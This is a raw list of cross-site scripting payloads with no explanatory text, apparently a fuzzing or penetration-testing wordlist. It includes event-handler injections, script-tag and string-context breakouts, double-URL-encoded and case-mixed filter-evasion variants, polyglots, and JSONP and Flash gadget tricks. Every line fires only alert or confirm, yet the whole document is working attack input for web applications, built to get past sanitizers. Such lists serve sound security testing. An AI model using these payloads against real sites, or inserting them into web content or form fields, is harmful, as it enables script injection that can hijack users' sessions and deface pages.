<x onclick=alert(1)>//X
<img src=x onerror=alert(1)>//
<img src=x autofocus onfocus=alert(1)>//
<svg onload=alert(1)>//
<x onclick=alert(1)>X
<img src=x onerror=alert(1)>
<img src=x autofocus onfocus=alert(1)>
<svg onload=alert(1)>
<script>alert(1)</script>
</script><script>alert(1)</script>
</noscript><script>alert(1)</script><noscript>
</title><svg onload=alert(1)><title>
%2522%253E%253CsVg oNlOaD%253Dalert%25281%2529%253e
%2522%253E%253CsVg oNlOaD%253D%2522alert%25281%2529
%2527%253E%253CsVg oNlOaD%253D%2527alert%25281%2529
%2522%253E%253CsVg oNlOaD%253Dal%255cu0065rt%25281%2529%253e
%253c%252fsCrIpT%253e%253csCrIpT%253ealert%25281%2529%253c%252fsCrIpT%253e
%2522%252dalert%25281%2529%252d%2522
%2522%252dal%255cu0065rt%25281%2529%252d%2522
%2527%252dalert%25281%2529%252d%2527
%2527%252dal%255cu0065rt%25281%2529%252d%2527
%255c%2522%253balert%25281%2529%253b%252f%252f
%255c%2527%253balert%25281%2529%253b%252f%252f
</sCrIpT><sCrIpT/*%0A<k>%28confirm%29(1)</sCrIpT>//
<iMg%0A%2fsRc%0A%3D%2f%20%0A/**/oNcLiCk%0A%3D%28confirm%29(1)>//
<bOdY%0A////////%0A%00/**/oNlOaD%0A%20%3D%28confirm%29(1)>//
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<sVg%0A////////%0A%00/%0A/**/oNlOaD%0A=(confirm)(1)>//
<output name="jAvAsCriPt://%26NewLine;\u0061ler%26%23116(1)" onclick="eval(name)">X</output>
<javascript: onmouseover=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
<svg onload=`<script`-alert(1)>
<svg onload=top[8680439..toString(30)](1)>
<svg onload=javas%26%2399ript:alert(1)>
<script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);></script>
<input onfocus="alert(1)" autofocus>
</title><svg onload=alert(1)><title>
</NOSCRIPT><svg onload=alert(1)><NOSCRIPT>
testtest"autofocus onfocus=alert(1)//
testtest'autofocus onfocus=alert(1)//
testtest"autofocus onfocus="alert(1)
testtest'autofocus onfocus='alert(1)
testtest"><svg onload="alert(1)
testtest'><svg onload='alert(1)
testtest"><svg onload=alert(1)>
testtest'><svg onload=alert(1)>
testtest%2522%252F%253E%253Csvg%20onload%3Dalert(1)%253E
</SCRIPT>%0A<SCRIPT>alert(1)</SCRIPT>
</SCRIPT>%0A<svg onload=alert(1)>
<output name="jAvAsCriPt://%26NewLine;\u0061ler%26%23116(1)" onclick="eval(name)">X</output>
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
<embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
"><video </onloadeddata="1> (_=alert,_('sadd'))"" controls><source src="https://www.w3schools.com/html/mov_bbb.mp4"></video>
<!-- --!> <script>alert`1`</script> -->
"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);// 
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/
alert(1)%26sol;%26sol;
'';!--"<XSS>=&{()}
'';!--"=&amp;{()}
'';!--"=&{()}
javascript:alert(1)
"'--!><Script /K/>confirm(1)</Script /K/>#
�!"><svg/onload=confirm(1)>
<"/*'/*</Title/</Script/--><svg/**/; OnlOad=(alert)(1)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e